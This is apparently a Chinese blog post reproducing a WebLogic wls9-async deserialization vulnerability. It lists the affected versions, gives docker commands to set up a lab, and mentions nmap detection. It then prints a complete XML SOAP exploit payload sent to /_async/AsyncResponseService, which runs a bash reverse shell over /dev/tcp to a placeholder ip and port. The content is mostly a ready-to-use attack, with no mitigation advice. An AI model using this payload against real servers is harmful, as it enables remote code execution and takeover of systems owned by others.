漏洞概述:
该漏洞存在于wls9-async组件,这个组件主要作用是异步通讯服务,攻击者可以向/_async/AsyncResponseService路径下传入构造好的恶意xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,从而可以getshell。
漏洞版本:
WebLogic 10.3.6.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0
漏洞搭建:
docker快速搭建,访问7001登录页面及成功
1.docker pull ismaleiva90/weblogic12
2.docker run -d -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest
漏洞复现:
- Linux
首先访问/_async/AsyncResponseService来判断是否启用该组件
也可以用namp插件进行扫描weblogic.nse
向/_async/AsyncResponseService发送XMLPoc,连接类型content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/ip/port 0>&1</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>
即可成功反弹shell
http://www.oniont.cn/index.php/archives/216.html
评论